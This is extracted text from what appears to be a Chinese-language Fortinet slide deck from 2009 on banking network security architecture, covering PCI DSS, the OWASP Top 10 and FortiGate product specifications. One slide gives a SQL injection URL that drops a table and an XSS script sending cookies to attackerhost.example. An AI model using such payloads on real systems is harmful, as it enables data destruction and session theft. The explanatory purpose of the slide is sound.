金融系统安全解决架构

1July,2009建设高校绿色网络应用安全架构建设金融网络应用安全架构2内容安排

Fortinet安全产品系列5银行应用网络安全部署2银行网络安全区域架构分析3统一安全的行业技术发展方向4

1国际行业安全形势及PCI规范

6Fortinet公司安全服务3用户面临的安全威胁正日益增长3恶意软件指数级的增长（单位：千）美国国防部报告的恶意网络行为（单位：千）HackersBreachHeartlandPaymentCreditCardSystem(1/20/2009)“HeartlandPaymentSystems(HPY)disclosedthatintrudershackedintothe

computersitusestoprocess100millionpaymentcardtransactionspermonthfor175,000merchants…”ElectricityGridinU.S.PenetratedbySpies(4/8/2009)“CyberspieshavepenetratedtheU.S.electricalgridandleftbehindsoftwareprogramsthatcouldbeusedtodisruptthesystem,accordingtocurrentandformernational-securityofficials...”U.S.SouthKoreaInvestigatePossibleNorthKoreanCyberAttack(7/8/2009)“Aseriesofcoordinatedattacksongovernmentandfinancialwebsitesstarted

aroundthesametimeNorthKoreatestednewmissilesandfacedfreshsanctions…”混合型攻击现在成为主流检测层次需要提升

性能压力增强攻击的动机从吸引注意力转向经济利益网络安全的重要性越来越高4用户的商业安全需求日益提高4企业数据中心的网络吞吐量10MB100MB1GBMulti-GB10GB企业的信息安全需要遵循更多的一致性要求一致性要求既来自于政府颁布的法律法规，也会来自于行业规定或商业伙伴的要求IT预算收缩安全开销增加网络需求正不断加速安全需求也需要与之匹配SOX404FISMAHIPAA2009至2010年IT服务花销变化EUDataProtectionDirective5国际化的行业数据漏洞和破坏“AtlantisResort

报告数据被偷影响了

55,000

客户”“Marriott丢失了存有206,000个客户个人信息的备份磁带”“CardSystemsSolutions公司4000万张信用卡被破解，其中包括1390万张万事达信用卡和2200万张Visa信用卡“GuidanceSoftware报告有漏洞”“WellsFargoBank报告被偷的计算机上包含私人数据”“LexisNexis被黑的数据库包含

310,000

客户信息”“BankofAmericalooses丢失的备份磁带内存有1200万联邦数据”数据安全漏洞还在上升...5000万客户受到影响!!应用系统漏洞都已经防护了吗?未报道的那些漏洞会怎么样呢?这些数据为什么会受到攻击?6FortinetConfidential

在过去3年中，数据窃取者增加了650%—CSI/FBI51%以上的破坏行为并未被告知公司中的每一名员工。

—CIO平均每起内部攻击导致的经济损失为270万美元。

—CSI/FBI调查报告20%以上的金融公司都遭受过数据破坏行为。

—EvansDataCorp金融行业信息安全威胁的现状78%以上攻击者都是授权用户：如公司员工、设备或第三方服务提供商等。-CERT/SecretService7完善的安全防御覆盖能力（数据安全，传输安全，内容安全等）动态安全的服务能力（自动适应性更新）

行业IT安全法规的遵从（PCI，CISP，SOX,FSA等）减少IT安全风险，降低IT管理资源稳定的性能和高效运营能力简单的部署方式和灵活的网络适应性完整的产品部署解决方案和未来平滑升级支持国际金融行业IT安全建设重点动态威胁安全防御能力良好的投资回报性能复合型安全效能回报

降低TCO总体投入和维护成本保护绿色能源遵从绿色能源消耗优化物理空间节约业务稳定性保持8国际金融行业IT安全规范PCI成立于2004年12月，由5家最顶尖的信用卡行业组织发起发布了PCIDSS，使各企业自有的安全策略保持一致标准制定是为了确保在企业存储、处理、传输持卡人数据时，应满足最低级别的安全风险金融处理信用卡信息时，必须遵从新的PCI标准2008年10月发布1.2版本建立从网络层，内容层到应用层的体系安全结构强调防范常见的编码漏洞，特别是OWASP（开放的web业务服务安全组织）中定义的漏洞编码检查或确保在公开的Web应用前部署Web应用防火墙，以检测并阻止基于Web的攻击。

增强合规企业的信誉，降低安全风险，是现代金融企业安全标准Fortinet是PCI安全标准委员会的成员之一(2009年10月6日)99CISP/PCI安全规范遵从方案PCI数据安全标准描述Fortinet解决方案构建并维护安全网络安装并维护防火墙配置以保护持卡人数据不使用供应商缺省设置的系统密码和其他安全参数FortiGate集成的防火墙功能FortiDB漏洞评估管理和审计保护持卡人数据保护存储的持卡人数据加密通过公共网络传输的持卡人数据和敏感性信息FortiGate集成的VPN功能FortiWebweb应用安全网关维护漏洞管理计划使用反病毒软件并定期更新开发、维护安全系统和应用程序FortiGate集成病毒网关FortiClient桌面反病毒FortiDB数据库漏洞管理和审计Fortinet具有成本效益的金融机构类产品帮助金融机构匹配和维持CISP/PCI法规1010PCI数据安全标准描述Fortinet解决方案实施可靠的访问控制措施只有具备业务需求的人才能访问持卡人数据为每位拥有计算机访问权限的用户分配唯一的ID严格限制对持卡人数据的物理访问FortiGate

安全用户认证授权FortiDB数据库权限审计定期监控和测试网络跟踪和监控访问网络资源和持卡人数据的所有操作定期测试安全系统和流程FortiAnalyzer

网络日志报告审计，FortiDB漏洞评估扫描和审计维护信息安全策略维护针对信息安全的策略FortiManager

集中管理设备Fortinet具有成本效益的金融机构类产品帮助金融机构匹配和维持CISP/PCI法规CISP/PCI安全规范遵从方案11FortinetConfidental保密文件11现代金融系统三维安全架构特点VPN数据加密VPN提供了数据安全加密和传输通道

网络防火墙防火墙提供了网络层区域威胁防御体系

防病毒网关/DLP

检测/阻止病毒/木马和恶意代码安全信息泄漏保护IPS入侵防御IDC网络服务器系统监控网络行为和系统安全警告

Web前置安全检测Web接口应用的渗透性不规范访问安全

数据库安全业务后台数据安全评估和访问安全审计业务应用安全网络连接安全系统内容安全12网络应用的变化Page12|

Collaboration/Media

防火墙只基于网络和端口的检测的脆弱性问题…新型应用的发展逐渐多样化Ports≠ApplicationsIPAddresses

≠

UsersProblem:ITCan’tSafelyEnableInternetApplicationsSaaSPersonal安全威胁从网络层扩展到应用层13从战略发展角度来考虑IT安全建设问题？面向未来考虑您的安全基础构架先于威胁的变化立体安全威胁的自动化更新防御建立统一巩固的安全体系，而非逐点式部署降低复杂性增强保护能力减少风险降低资本性支出和运营成本从系统结构角度部署应对安全威胁到2010年为止，只有10%

的安全威胁会被单一功能安全产品发现，而在2005年这个数字还是80%。

Source:Gartner““*Gartner:CostCuttingWhileImprovingITSecurity,March20,200814安全的复杂技术考虑防火墙安全管理安全监控系统攻击IPS病毒/蠕虫数据泄漏网站过滤数据加密传输邮件安全应用控制三层路由广域传输优化15Fortinet提供战略性安全服务综合安全解决方案集成的战略安全结构统一的安全威胁管理更低的TCO降低复杂性和管理难度简化实施和配置实时安全防御

24×7全球安全更新集中云式服务体系灵活部署

适应客户的时间表和预算基于客户的特性服务16第三方系统内部数据交换区EAI,UDI,CCIWeb前置机业务应用系统数据库系统业务管理数据库应用平台集中管理和审计安全分析DNSSMTPFTPProxy集中管理区内网应用和数据区OCRM,BDBWeb前置机业务应用服务器数据库系统网银服务器系统公共E-Banking系统OA办公区核心区互联网区银行业务局域网区域安全区结构internet17OA办公区网管区域内部业务区电子银行业务区企业客户宽带家庭用户恶意访问移动用户InternetIntranet银行业务广域网区域安全区结构18内部用户访问外网的策略控制问题内部用户安全区域间的访问隔离需要内部用户访问internet的病毒/色情网页问题内部用户多线程应用程序的带宽耗尽问题平衡单用户的流量均衡问题内部用户上网的安全审计问题用户主机的僵尸网络感染问题用户主机的非主动性垃圾流量会话攻击问题基于用户帐号的授权策略问题病毒/蠕虫防火墙安全监控

OA办公网络的威胁分析Web过滤邮件过滤混合型威胁及新应用带来的问题总部恶意网页蠕虫病毒间谍软件

P2P、IM应用垃圾邮件网页欺骗木马软件……DMZ服务器区internet20OA办公网安全部署internetICSA国际计算机组织认证防病毒网关22多协议检测方式企业网络资源网页/邮件/文件传诵/聊天公共网络资源互连网

01010101010101010010111011高性能的芯片加速防病毒引擎FortiASIC-CP

(内容处理器)特征匹配防病毒IPS内容过滤加密解密VPN协商密钥维护FortiASIC-NP

(网络处理器)高速包转发线速防火墙IPSecVPNNAT防DoS攻击流量整形Source: FortiGuardPrevalenceReport, 30daysTop10MalwareinCanadathroughApril21,2007全球部署的安全监控制体系VB100病毒安全扫描认证26外联业务的对象策略控制问题外联业务的安全传输问题外联流量的系统层威胁问题外联流量的恶意垃圾拥塞问题外联业务的数据流传输优化问题外联业务的虚拟化通道隔离业务流量中的蠕虫/木马入侵式威胁业务流量监控系统攻击IPS病毒/蠕虫防火墙安全监控外联业务网络的威胁分析传输优化数据加密27外联业务虚拟安全隧道部署Intranet分支银行分支银行营业所营业所业务虚拟安全隧道接入28网银业务的安全分析Web应用是业务的主要平台49%的Web应用包含高风险级别的漏洞，很容易被自动工具探测攻击80%-96%的Web应用包含有易被黑客攻击的漏洞99%的Web应用不合乎PCIDSS规范现有的网络层检测技术不能防范大多数常见的漏洞攻击跨站脚本

SQL注入信息泄漏HTTP回应截断攻击的商业影响：减少收入–每丢失一条记录损失$300不合规的处罚损害企业声誉基于web交互界面入侵后台数据库系统是目前主流的威胁方式国际行业专业组织OWASP/Webappsec专注于web应用安全的分析29Web应用安全威胁分析最流行的威胁类型最常见的应用弱点(/projects/statistics/)

Slide293080端口HTTP请求http://XX.XX.XX.XXX/web/n2/productview.asp?id=97;drop%20table%20Card_kevin交换机防火墙Web服务器DB数据库Select*fromproductwhereid=97Droptablecard_kevin命令已执行成功<SCRIPT>Document.location=‘http://attackerhost.example/cg-bin/

getcookie.cgi?’+document.cookie</SCRIPT>跨站脚本/SQL注入式攻击Intranet31OWASP开放web应用服务安全组织漏洞描述A1-跨站脚本CrossSiteScripting(XSS) 当应用程序提取用户提供的数据并发送到Web浏览器，数据内容没有先经过验证或编码时，可能出现的XSS漏洞。XSS允许攻击者在受害者的浏览器上执行脚本，脚本可能会劫持用户会话、破坏Web站点或引入蠕虫等。A2–注入攻击InjectionFlaws注入漏洞，特别是SQL注入，通过在Web应用程序内。当用户提供的数据作为命令或查询的一部分被发送到解释器时，可能出现注入漏洞。攻击者的恶意数据欺骗翻译器执行非用户本意的命令或改变数据。A3–恶意文件执行MaliciousFileExecution远程文件包含(RFI)代码缺陷允许攻击者包含恶意代码和数据，导致破坏性的攻击，如全部服务器被攻陷。恶意文件执行攻击会影响PHP、XML以及任意从用户接收文件名或文件的架构。A4–不安全的直接对象引用InsecureDirectObjectReference当开发人员把一个引用暴露给内部执行对象时，如一个文件、目录、数据库记录或键值、URL或格式参数，可能发生直接对象引用。攻击者可以操纵这些引用访问其它未经认证的对象。A5–跨站请求伪造CrossSiteRequestForgery(CSRF)CSRF攻击强制登录用户的浏览器发送经过预先认证的请求到一个有漏洞的Web应用程序，接着强制受害者的浏览器执行一个对攻击者有利的恶意行为。CSRF能和它所攻击的Web应用程序一样有效。A6–信息泄漏及不正确的错误操作InformationLeakageandImproperErrorHandling应用程序可能通过各种应用程序问题非用户本意的泄漏配置、内部结构或隐私等信息。攻击者利用这个弱点偷窃敏感数据或传入更多严重的攻击。A7–失效认证及会话管理BrokenAuthenticationandSessionManagement信任账户及会话令牌通过没有被完全的保护。攻击者使用密码、密钥或认证令牌伪装其它用户的身份。A8–不安全的密码存储InsecureCryptographicStorageWeb应用程序很少能适当的使用密码功能来保护数据和credential。攻击者通过缺乏有效保护的数据来窃取身份及其它犯罪行为，如信用卡欺诈。A9–不安全的通信InsecureCommunications敏感数据需要被保护，而应用程序经常没有对网络流量进行加密。A10–限制URL访问失效FailuretoRestrictURLAccess通常，应用程序只能通过对非认证用户链拉或URL的显示来保护敏感功能。攻击者能利用这个弱点，通过直接访问URL来访问并执行未授权的操作。32后台数据库的安全与规范目标数据库与利润相关的特定目标数据大量的经由互联网和应用程序的访问整合度越大，体现出的价值越大数据库数据遭到破坏而导致的损失接近每条$200*检测/扩大，通告，商业损失2005-2007，有将近1亿5000万的数据库数据记录丢失来自于内部人员的安全威胁只保障边界网络安全是不够的高权限用户引起的安全威胁占78%*，职责分离*来源:Ponemon研究所33内部用户合法权限滥用权限盗用越权滥用权限分配不当临时帐号未及时清理备份数据缺乏保护离职员工的后门合作伙伴合法权限滥用权限盗用越权滥用后门程序DB2/SQL/Oracle/Sybase数据库软件数据库平台漏洞通讯协议漏洞弱鉴权机制日志缺失或不完整

4W：-是谁，做了什么-什么时候，在哪里跟踪：-登录-数据/文件访问-数据/文件变化-模式变化-日志窜改-人为错误-可疑的活动-自定义事件数据库安全审计规范34网银服务区安全部署外部用户网银服务器数据库/LDAP服务器Web门户系统Web安全防护设备InternetIntranet数据库监控设备Web注入攻击数据库攻击数据库攻击Web应用安全检测XML内容语言检测SSL/XML加速Web负载均衡专业硬件芯片技术多种应用签名技术漏洞扫描监控与审计支持多种数据库安全补救措施建议跟踪轨迹预配置报告类型Web安全数据库安全Interet35图形报告攻击审计日志36虚拟化业务服务器群安全分析固定对象和应用访问的策略控制问题访问会话的攻击性泛滥压力拒绝服务的资源性攻击压力系统层弱点探测攻击的问题基于访问者的流量控制问题畸形数据包重组的协议层压力业务的长连接保持问题虚拟化安全策略配置问题蠕虫/木马入侵式威胁系统攻击IPS病毒/蠕虫防火墙安全监控37虚拟化业务服务器集群虚拟业务服务区一防火墙虚拟策略工作模式安全配置:AV安全配置:AS安全配置:WCF安全配置;IPS路由业务安全策略组安全配置:TS安全审计策略组业务服务器集群区安全部署核心交换机安全网关安全网关核心交换机InternetIntranet38统一安全管理监控系统

分支银行

分支银行

移动用户

IntranetInternetOA办公区网管区域内部业务区电子银行业务区安全扫描管理审计39安全集中统计报表超过300个报表模版报表设置向导报表完全可定制报表示例事件/攻击基于:

设备

来源

类别

威胁名称

协议邮件使用率Web使用率带宽使用率协议使用率

40安全集中监控中心41Fortinet公司概况全球领先的专业整合安全技术提供商专业网络安全厂商2000年成立1200+名员工/超过500+工程发展最快的专业安全公司全球化的销售服务体系(美国，欧洲，亚洲)华尔街业绩增长最好的公司之一FTNT(IPO)权威的安全认证6项ICSA(计算机安全实验室）认证最高级政府安全认证(FIPS-2,

CommonCriteriaEAL4+)100+安全行业认证ISO9001认证美国病毒专业评测试VB100认证

欧洲专业IPS安全评测NSS认证Frost&Sullivan/IDC全球最大的整合性安全厂家42为全球运营商提供增值安全服务43金融行业客户4444安全市场分额报告IDCQuarterlyApplianceTracker,June2009(basedonrevenues)Gartner,Inc.,“1H09MultiFunctionFirewallMagicQuadrant”byG.YoungandA.Hils,JuneX,2009.2007Frost&SullivanAwardfor“MarketLeadershipinUTM”and“GlobalCompetitiveStrategyLeadershipoftheYear"SourceIDC报告整合性安全市场

Gartner报告多功能防火墙市场Frost&Sullivan报告整合性安全市场45全球整合性安全市场的发展趋势45

2008 2009 2010 2011 2012 2013Firewall&VPNUTM(-0.5%)CAGR$2.2$2.1$inbillions13.8%CAGR$1.7$3.2Source:IDC“WorldwideNetworkSecurity2008-2012Forecastand2007VendorShares:Transitions–AppliancesAreMoreThanMeetstheEye”46国内UTM整合性安全市场的发展47Fortinet统一网络安全解决方案

应用层安全FortiGate七层UTM安全网关安全云服务FortiGuard实时安全云服务网络FortiMail邮件交付安全FortiWebWeb服务安全主机访问安全FortiClient主机安全FortiScan资产安全管理FortiDB数据安全审计

边界网关安全数据库安全FortiManager集中安全管理FortiAnalyzer集中安全审计统一安全管理48旗舰产品：FortiGate安全网关系列平台远程分支桌面级中低端产品线中高端产品线高端产品线FG5000FG30B-80CMFG110C-620BFG5000

FG1240B-3810A反垃圾邮件应用控制防火墙流量控制VPN防病毒IPSWeb过滤SSL加速DLPWAN优化无线支持NAC终端控制49技术特点：分布式安全到集中式管理的演变49Fortinet解决方案传统分布式安全设计集中式的部署和管理，专用硬件设计结构，一站式安全防御技术TCO成本投入低，安全效能高易于部署和维护，符合绿色IT建设规范安全产品分类过多，管理繁琐

安全防御效果差，安全问题难于定位总体投资成本过高产品部署和维护对当前网络影响明显50

技术特点：为IT网络提供一站式安全防御50“危险的”视频链接：重定向至恶意网站Web过滤阻挡对恶意网站的访问网络防病毒阻止病毒下载入侵防御阻止蠕虫的传播FIREWALL

主机感染后外部散播在系统中不断复制自身，并试图扩散WEBFILTERINGANTIVIRUS“恶意”文件渗透：下载恶意文件INTRUSIONPROTECTION

PORT80一站拦截多样化安全威胁应用层防火墙安全过滤不同应用51

产品硬件结构特色：NP+ASIC52业界UTM安全网关的功能比较52PartnerSuppliedInternallyDevelopedNotavailable53业界UTM安全网关的业界认证比较53SomeproductsarecertifiedPassedCertificationnotconducted54FortiGateUTM安全网关功能概述防火墙/VPN策略控制模块集中安全策略管理/日志报表审计平台FortiManager/FortiAnalyzer病毒/垃圾邮件/攻击库/web库升级中心DOS/IPS系统攻击保护模块病毒/间谍软件/蠕虫安全模块垃圾邮件保护模块IM/P2P应用控制模块网页过滤安全

模块

广域网加速模块DLP数据弱点保护55多种语言的web管理设计符合IT管理规范5556安全模块:策略配置企业网络资源公共网络资源公共网络个体互连网57认证模块:灵活的用户认证ClientSTOP!用户访问服务器资源时，先进行认证，输入正确的用户名密码才可以继续访问管理员进行服务器管理员工访问办公系统合作伙伴访问相应资源对不同用户设置不同的访问权限支持认证方式本地、Radius、LDAP、SecurID、WindowsAD、PKI证书58安全模块:病毒防御应用企业网络资源网页/邮件/文件传诵/聊天公共网络资源互连网高性能的ASIC芯片硬件加速防病毒引擎FortiASIC-CP

(内容处理器)特征匹配防病毒IPS内容过滤加密解密VPN协商密钥维护FortiASIC-NP

(网络处理器)高速包转发线速防火墙IPSecVPNNAT防DoS攻击流量整形支持多种网络协议的病毒过滤HTTP、FTPSMTP、POP3、IMAPIM、NNTP、CIFS支持协议使用非标准端口可对SSL加密流量进行病毒过滤拦截客户机和服务器之间的通信拦截SSL握手时传输的合法密钥，并进行替换。以客户机身份与服务器通信以服务器身份与客户机通信支持HTTPS、SMTPS、POP3S、IMAPS病毒检测方式基于病毒特征目前能检测的病毒种类为100万种以上支持多级病毒库支持流扫描方式完整覆盖Wildlist病毒库每天4次更新病毒库宏病毒检测基于病毒行为启发式扫描压缩文件扫描支持多种压缩格式100层压缩性能与安全的平衡可根据安全级别和性能需求，选择4种不同级别的病毒库。权威的防病毒认证ICSA防病毒认证VB100防病毒认证FortiGuard更新服务FortiGuard全球分布式服务器-自动地实现病毒库升级，可以在10分钟内到达所有的FortiGate设备-自动、手动、推送式更新-支持在线及离线方式更新-每天4次更新病毒库本土化服务（北京研发中心，200+工程师）FortiGuard中心

网站和邮件公告点业界领先的病毒库更新速度文件大小过滤超大文件过滤可选择处理方式–通过或阻断文件类型过滤文件名*.exe等文件类型可执行文件等（可防止修改文件扩展名逃避检查）间谍软件/恶意软件过滤病毒拦截提示报警蠕虫病毒防御-IPS病毒进入内网后往往不再以文件形式通过Internet应用协议传播可通过IPS方式阻挡蠕虫病毒的传播防病毒与IPS的界限越来越模糊蠕虫病毒防御–会话监视蠕虫病毒防御–会话排名蠕虫病毒防御-会话限制会话限制TCPUDPICMP防御蠕虫病毒产生的DoS病毒传播媒介防御-恶意网页及垃圾邮件降低恶意网页和垃圾邮件传播病毒的风险FortiGuard分类过滤76类，5000多万个网站实时更新数据库URL过滤黑白名单Email地址及IP地址过滤关键字过滤支持多种语言脚本过滤ActiveXJavaAppletCookies隔离病毒及入侵者隔离IP地址隔离IP组合隔离源接口定时自动释放手工释放77安全模块:IPS/NAC隔离攻击者支持DOS攻击防御和会话控制IPS特征库支持3000攻击特征,24X7升级服务自动隔离攻击者源地址、源及目的地址、来源接口防止之后可能的持续攻击彻底阻断，而非仅仅检测到的端口可以设置隔离时间互连网公共网络资源公共网络个体企业网络资源

01010101010101010010111011

0101010101010101001011101101010101010101010101010101010101078安全模块:网页内容过滤FortiGuardweb过滤库；82个类别控制；超过4000万个URL；实时数据库更新79安全模块:网页的过滤应用网络访问的内容控制支持WEB内容关键字过滤屏蔽具有政治或敏感的网页内容BBS论坛内容控制

互连网公共网络资源公共网络个体企业网络资源网页/BBS论坛80安全模块:垃圾邮件防御应用互连网公共邮件资源公共网络个体企业网络资源邮件传输81安全模块:

VPN数据安全应用分支企业间互连IPSecVPNGRE通道移动用户访问IPSecSSLPPTPL2TP

分支企业

互连网分支企业中心企业互连网加密通道加密通道分支/中心企业82SSLVPN应用ClientSTOP!用户访问服务器资源时，客户端到网关的数据将被加密传输，然后进行认证，输入正确的用户名密码才可以继续访问管理员进行服务器管理员工访问办公系统合作伙伴访问相应资源对不同用户设置不同的访问权限支持SSL加/解密加速支持认证方式本地、Radius、LDAP、x.509数字证书认证、WindowsADSSL加密83SSLVPN登录界面定制欢迎语界面风格组件选择功能选择终端检测虚拟桌面84广域网传输优化应用Internet/WANHTTPCIFSHTTP/CIFS数据请求本地存储文件副本HTTPCIFSH100001111H2DictionaryH1=01010101H2=11110000DictionaryH1=01010101H2=11110000WAN优化的目的：通过减少跨广域网应用的通信及数据传输的数量，提高网络性能增进应用的性能,提高工作效率改善带宽的效率,支持更多的用户和应用分支企业资源互访的重要特性85Web网际缓存应用WebServerClientHTTPWCCPHTTPWeb缓存技术可以有效地降低Internet网络流量节约昂贵的广域网链路费用提高用户访问速度支持WCCP协议和外部缓冲设备

86安全模块:应用控制互连网企业网络资源IM聊天P2P传输公共网络资源87FortiGateUTM安全网关系列88FortiGate50B-620B中低端产品系列AV=httpthroughput产品型号防火墙VPN策略数并发会话新建会话VPN通道FG50B50M45M50025,000200020FG60C1Gbps70M500080,0003000500FG-80C350M80M2,000100,0005000200FG-110C500M/1G100M4,000600,000150001,500FG-310B8G/12G6G/9G8,0001,000,000250003,000FG-620B20G/24G12G/15G8,0001,000,0002800020,000FortiGate-50B–FortiGate-110C89FortiGate1240B-2950B中高端产品系列Performanceresultsdisplayedasbase/fullAMCexpandedusingUDPlargepacketsizesAV=httpapplicationthroughput型号防火墙会话VPN新建会话策略数

通道FG-1240B40Gbps2000,00024G100000100,00020,000FG-3040B40Gbps4000,00016G100000100,00064,000FG-3950B120Gbps10,000,00048G175000100,00064,00090支持各种Internet接入方式未来的无线网络区域经理移动PC信用卡

Web订购自助机无线的销售点

3G91FortiGate-100系列FortiGate-110C基于FortiASICCP的安全加速2个10/100/1000WAN接口8个10/100内置交换接口1个控制接口2个USB接口1U高度桌面式设备配有19”机架安装工具性能500Mbps防火墙100MbpsIPSecVPN65Mbps防病毒200MbpsIPSFortiGate-111C内置64GSSD硬盘（支持WAN优化）92FortiGate-200BFortiGate-200B基于FortiASICCP/NP的安全加速4x标准10/100/1000端口4x加速10/100/1000端口8x标准10/100端口1xFSM存储插槽(标配64GSSD)1个控制接口2个USB接口1U高度性能防火墙：4GbpsIPSecVPN：3Gbps病毒检测：100Mbps新建会话：20K并发会话：800K93FortiGate-310BFirewall性能比较Notice:防火墙性能是基于平均包大小512字节情况下测试的结果

很多厂家在发布其产品的性能指标是都不透露测试时的包大小。94FortiGate-310B产品对比*AV性能测试基于数据流技术,不能缓冲和还原文件FortinetJuniperJuniperCiscoCiscoSonicWallFortiGate-310BSRX-650SSG-550MASA5520

w/Anti-XASA5540NSA5000性能

防火墙吞吐量–平均包大小(512byte)(wAMC)

8Gbps

(12Gbps+AMC)7Gbps1Gbps450Mbps650Mbps1.8Gbps防火墙吞吐量–小包(64byte)(+AMC模块)

8Gbps

(12Gbps)460Mbps300M163M256MUnknownVPN吞吐量-3DES

(+AMC模块)

6Gbps

(9Gbps)1.5Gbps300Mbps225Mbps325Mbps1.1GbpsIPS吞吐量

800Mbps900MbpsUnknown225-375Mbps(AIP-SSM-10/20)450Mbps(AIP-SSM-20)

500MbpsIPSecVPN通道数3,0001000（接口模式300）75050002,500并发会话数1,000,000500,000128,000280,000400,000600,000每秒新建会话30,0003,50001500012,00025,0008,500策略8,000

4000UnknownUnknownUnknown硬件配置基本10/100/1000端口1044446模块插槽166个PIM1N/AN/A产品型号95FortiGate-300系列FortiGate-310B8×1000M电口（小包线速）2×1000M电口（非小包线速）1×单宽AMC插槽2×USB支持RPS冗余电源吞吐量8-12Gbps防火墙（小包）6-9GbpsIPSecVPN（小包）160Mbps防病毒800MbpsIPSAMC扩展模块FortiGate-310B-DC直流电源版本FortiGate-311B2×FSM扩展槽内置64GSSD硬盘内置冗余电源96FortiGate-620B硬件16个FortiASIC网络处理器(NP)加速接口4个非NP加速铜口1个单宽AMC插槽2个USB接口支持RPS冗余电源性能16-20Gbps防火墙（小包）12-15GbpsIPSec（小包）250Mbps防病毒1GbpsIPS97FortiGate-620B防火墙性能比较FortiGate-110C防火墙性能是基于平均512字节数据包得出许多竞争对手对公布的性能指标没有数据包字节数的数据.98FortiGate-620B产品比较*防病毒性能基于流防病毒扫描Fortinet

FortiGate-620BJuniper

SSG-SRX650ISG2000Cisco

ASA5550

w/Anti-XCheckPoint

UTM-13070性能

防火墙吞吐量-平均包长(512byte)(配置AMC)

16Gbps

(20Gbps)7Gbps4Gbps1.2Gbps4.5Gbps防火墙吞吐量–小包长(64byte)(配置AMC)

16Gbps

(20Gbps)460Mbps2Gbps没有公布没有公布IPSecVPN吞吐量-(配置AMC)

12Gbps

(15Gbps)1.5Gbps2Gbps425Mbps1.1GbpsIPS吞吐量1Gbps900MbpsN/A225-325Mbps没有公布专用IPSecVPN通道数20,00010,0005,000没有公布并发会话1000,000500,000100,0000650,0001,100,000新建会话每秒40,0003,500023,00036,000没有公布策略数100,000

30000没有公布没有公布硬件配置

固定10/100/1000Port2040-8810模块插槽可扩展4个1G光口60-16N/AN/A99FortiGate-1240B14x加速10/100/1000端口24x加速SFP端口2x标准10/100/1000端口1x单宽AMC插槽6xFSM存储插槽(单独订购FSM-06464GSSD硬盘)1xUSB1xconsoleport防火墙-40GbpsIPSECVPN-24Gbps病毒检测-500Mbps新建会话

-

15万

并发会话-

200万最大VDOM:25支持软件RAID0/1100FortiGate-1240B性能比较项目FG1240BSRX3400NS5200ASA5580-2010/100/1000安全接口

(铜)28N/A2个，

一个ASA5580-4GE-CU可以增加4个接口1Gb安全接口(光纤/铜缆)384+模块扩展0-8一个ASA5580-4GE-FI可以增加4GESRLC10Gb安全接口(光纤)N/A0-20-20-12虚拟防火墙25N/A0-5002/50硬盘/CompactFlash可选384GSSD硬盘N/A128/512MN/A并发会话2M1M1M1M新建会话/秒100K80K-175K22,00090,000防火墙吞吐量40Gbps10-20Gbps4-10Gbps5GbpsIPS性能4Gbps6Gbps未公布不支持VPN168-位

3DES吞吐量24Gbps6G4-5Gbps1GbpsSSLVPNPeers

15000不支持不支持10,000IPSecVPN通道数64,00010,00025,00010,000策略数100,00040,00040,000N/A

FortiGate-3040B101FortiGate-3040B(前面板)FortiGate-3040B(后面板)接口规范线速10-GbESFP+接口8个线速

1-GbESFP接口10个10/100/1000管理接口2个10G光收发器2SRSFP+本地64G存储模块1个（可扩展到4个）

性能规范

最大网络层延迟8.5us防火墙性能40Gbps（64-1518字节）并发会话数500万新建会话数10万

IPSECAES性能16Gbps策略数10万FortiGate3950B

102FortiGate-3950BFMC-XD2万兆接口模块FMC-XG2IPS加速模块接口规范线速10-GbESFP+接口2个（可扩展到12个）线速

1-GbESFP接口4个（可扩展到100个）10/100/1000管理接口2个10G光收发器2SRSFP+性能规范

最大网络层延迟8.5us防火墙性能120Gbps（64-1518字节）并发会话数1000万新建会话数15万

IPSECAES性能48Gbps策略数10万电源双交流电源功耗507WFMC-C2020x10/100/1000M接口卡FMC-F2020x1GSFP接口卡1033040B竞争比较FortiGate3040BCiscoASA5580-40CheckPointPower-111085JuniperSRX3600CiscoASA5585-X-SSP60防火墙吞吐40Gbps20Gbps25Gbps30Gbps35Gbps并发会话4M2M1.2M2.25M2M每秒新建会话100K150KN/A175k350kIPSec性能16Gbps1Gbps4.5Gbps10Gbps5GbpsIPS性能5GbpsUDP1.6GbpsHTTPNo15Gbps10Gbps10G病毒扫描1.2GbpsNoN/ANoNotSupportedWAN优化FSM256G存储NoNoNoNotSupported虚拟域YesUpto50N/AN/A50接口配置固定8x10GigSFP+,10x1GSFP接口2x10/100/1000M管理口，6个接口槽（可配4x1G,2x10G接口卡)

18x10/100/1000M,4x10G8x10/100/1000M接口，4个SFP1G,6个IOC接口槽（可配2×10G，16x1G接口卡）

12x10/100/1000M,8x10GigabitSFP+

103104集成交换矩阵ISF特点独特可扩展的数据包转发和安全处理结构利用网络加速模块FortiASIC-NP4和IPS加速模块–SP2实现数据安全处理FMC安全处理卡通过ISF内部交换矩阵对任意接口间的通信进行加速全网状的任意接口通信都可以通过ISF连接到FMC进行数据加速

104105高端万兆防火墙竞争比较FortiGate3950B思科ASA5580-40JuniperSRX3600Junos10.1JuniperSRX5600Juos10.1JuniperSRX5800Juos10.1H3CSecpathF5000-A5华赛8080E/8160E防火墙性能20-120G20Gbps10-30Gbps10-60G(4SPC)10-120G(8SPC)40Gbps40/80GbpsPPS包转发率178M4M6M7M(4SPC)15M(8SPC)N/A8-32M（4业务卡）/8-64M（8业务卡）并发会话10M2M1-2.25M9M(4SPC)10M(8SPC)4M4-16M(4业务卡）/4-32M(8业务卡)新建会话175,000（建立关闭）150，00050,000-175,000350,000(4SPC),只建立）350,000(4SPC),只建立）500,000250k-1M（4业务卡）/250k-2M(8业务卡)(只建立)IPSec性能8-48G1Gbps10Gbps15G(4SPC)30G(4SPC)N/A4-16G（4业务卡）4-32G(8业务卡）

IPS性能1.5G-10G(FMC卡)不支持10Gbps15G(4SPC)30G(4SPC)N/AN/A病毒扫描1.5Gbps（代理模式)不支持不支持不支持不支持不支持不支持虚拟域10-2500-50256（SecurityZones)256（SecurityZones)512（SecurityZones)5121024接口配置选择2x10G,4xGigE,5xFMC槽位（可配2x10G接口卡）2x10/100/1000M管理口，6个接口槽（可配4x1G,2x10G接口卡)8x10/100/1000M接口，4个SFP1G,6个IOC接口槽（可配2×10G，16x1G接口卡）5个/接口IOC插槽，

（可配16×1G卡，40x1G卡，4x10G接口卡）11个接口IOC插槽，

（可配16×1G卡，40x1G卡，4x10G接口卡）4G个接口槽（12xGE(8电＋4光)卡,或者2x10G卡）

